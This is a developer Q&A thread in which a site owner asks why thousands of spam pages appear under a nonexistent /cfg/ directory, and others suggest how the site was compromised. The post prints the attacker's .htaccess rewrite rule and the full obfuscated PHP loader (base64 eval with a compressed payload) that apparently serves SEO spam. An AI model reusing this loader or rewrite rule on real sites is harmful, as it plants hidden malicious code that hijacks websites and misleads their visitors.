Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
K
K
keslo2014-09-14 20:50:17
PHP
keslo, 2014-09-14 20:50:17

How to find a directory on the site that exists but is not visible?

Good afternoon, ladies and gentlemen!
The question in the title turned out to be rather chaotic. But... crlz seems to have been some kind of hack...
There is a website - www.macmachine.ru/ Everything works and opens there. About 20-30 pages.
Today I noticed that there are 5000+ pages in the Yandex index O_o I
started looking.
All new pages come from such a directory www.macmachine.ru/cfg/. But I don't have the /cfg/ directory on my hosting... and it shouldn't be. All links open some kind of slag with advertising.
What to do?
LATEST NEWS
1. Found these lines with htaccess:

Options +FollowSymlinks
RewriteEngine   on
RewriteRule ^cfg/(.*)$ /manager/includes/config.php/$1 [L] 
RewriteBase /

2. config.php is like this:
<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=ce1340daf66134d8ea13d1c9d6828eabd889094arVf/b9pGFP+ZSv0fXi0kmwkMZOrWEmVtRJwmUxIyIJWmNEKuOYM32+fZ54aopX/73rvzV6BkiYYAc3fv87l37+vRjGyxnPITHsMRaF3HXWiH8PJFM3g444mguQPz3k3wox3iNEmPwstiUQkLFkS+LRjO6O6SpwnTSdjhYcgckusdQrcLRh864NyML9rQw18T7vzNRCtjRakk/ZyI2GjOJtb4ozW+1cfWHzfWZDq7GZ/rd23ARZ+FRrNQudWibZYi8BG9YGLIQ8FCYWTat6GmrylHOJmr264wIZHngoFbSBWUpGY6SaK1WrBk9pzFhp5t0Jk+RGwAgq1EFyUOwVnaccLEUSrczhudyJifMNjFGIWLHzN6gb1gXRTZz/FXhBzw7RtsL7BH2UlmP/3Ccx8jQZH9HJ7DKxxaziEqHKsOCoXaXppV4Jc0UOoiSgegyJMcIFbiEZdicHjhUzjjapQ8Xcs9qlBs78Ih0llyQ8a+Grtp6AiPh7U8WJZZUI17qAQ+fCV0Y+Hzz7YPec5upA7u0KBz58sS1cB3o6mUTzAB7Ti2HwyabGhj5rKYxQNYChENul3NLLP6bDq9np2NJlP9ztRoJdfLLNWihbaiOnYcFomOb4eLFMNmACzMl24SFneOF3jUAUwsfjIad4a+h0Mwqtp3amdpaQQmozXUCRyqPU4a+zMv9IShVuQYbc4jNKOD1hti3RpdUy3C8qVnx9JNaWKl+CNAOvaZdXxijdG4udUewYyt6c34ajo+vpqcEq7/GGA4urqyhtPp+aU1upki4PVjiG3RmIk0DqEZsyT1RW6bmM29eMZWzDGATFahdXyeMGKVc2uQQf1V2vZz6rrUFXQp3UxkyceJ9y795BGVcxWkb3poFhbHIVdPzC+1hYw7BcyDtdF470apSPJ5TMEP1hS+SjesgSzd7Zu9T/EnVV52ASgUBgih3dd7JZ8XZXsp/4f02Ms/VGmK5WAA0jskXSAk5n7p+QyMV+9dxt3CwCqxG7nnTPIUFpQKd//gTbbrWn5nCmQxkNEogTKC2Cry+ZwZWqEHOpl2aMNBJpwxkbejmC1mgS2cpaF9v+COrQ5imD+1vhNQ0d728ErQDEqV815jrSIPRQZwyUPk/wV+T33ov337K/ReD3o9fMOHyylaAuq4oe0sWYdqZ8z9AYS849BMG4IUvRuzL7bvzdEPhMTbTBZl/Q2W69heBHYJ3y99YSP1JZ97rsfmA+q9AW1haCdtmMMl/AlnA2+A3cXUlM51eMH6c6+Px/3C5nDN4sAOMTr9hy3x0paaifmFOY2B5TCjFrlY3XQy7G3/Du9XbOWJLXfXKwQKSoks8bNFTZPF4OWLda07bdYSqhrSgXkD2mg7gK9EoNYOVh3C+pxHibpSwo7lwF4VIgeljGpeJR7gt6NNBOoBoDrC7o3olZ3u9PhiYhULa/X4cenPyr6IU9YqUP+56tdhTQwQO6/KhQ2LZd9LqPFLj7eVcOtHGUiLMgMLbqpHMwcF8w0w+b3Q5aWC51enI9nLsNecWK26hSvwIxmTeEfdnDzIErYpM5yVNwfF1WhU079bhCxm/7vWp7CrFd2TglRR5MgmakzNJaLr0gwHhoi9wJD0s4hHRgGQ/xxyn5Lqrwibl5Ju1+GpPw91AVHMHZYkIJYMiF1wkNFL/2vwt0rnXQFTSRMycy2I1pm6Pmb/TOlcqrzH7NbpKTb3848W3UJa+akL9W/1BA8XMP2uBfUxblBsVs5u46kZlmg1qmPV3DaS0rZEqlEdqeYyJH263WbI7rPzb+hrgk7XK3zWVDHr/CaGnBz/k7L4Qb97p7/DG1l1ZqDrqghubfV0Cvo8r8c8o8NUYTtaSnX5WT3kSR3kOf0js3fZQlTgq7vhVp09ypNmK2caMlnW/wI=

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

3 answer(s)
Report
A
Alexey Zakharov, 2014-09-14
@keslo

Are you sure that this folder is on YOUR server?
as I understand it, you have access to the site, and the site is relatively working (if all the pages of the site have suddenly changed, then look at the domain settings, maybe it was stolen).
Well, if there is access, then the problem is most likely in the scripts.
physically, this folder may not exist.

Report
M
Maksim Zverev, 2014-09-14
@m1skam

How you get hacked depends on a lot of factors.
1. Banal brute force, both admin panels and ftp / sftp
If you have sftp, look with the last command, if ftp, look at the logs. If you have hosting, ask the hosting company to give you ftp logs.
2. We used a third-party php component without understanding it.
3. The freelancer did something, the access leaked through him / with the help of him.
UPD: This thing has a cool name, it knocks on its own home under the user agent: SEoDOR-Client

Report
K
keslo, 2014-09-14
@keslo

Your expert opinion: how could such a code get on the site? And what steps can be taken to minimize this?

Similar questions
W
WebforSelf2021-03-23 23:45:26
How to start server after centos 7 backup, vestacp? 3Reply
A
Andrey Filimonov2017-04-10 11:30:43
Why is there an indent between fields? 3Reply
K
khudobinvasiliy2021-04-02 20:04:00
How to resolve 500 error on Flask Heroku? 3Reply
Y
Yuri Kulaxyz2019-09-21 23:05:53
Why doesn't Laravel sort() work? 3Reply
P
Pashchuk Ilya2017-05-09 21:42:00
How to resize a block when dragging in css3 and html5? 2Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question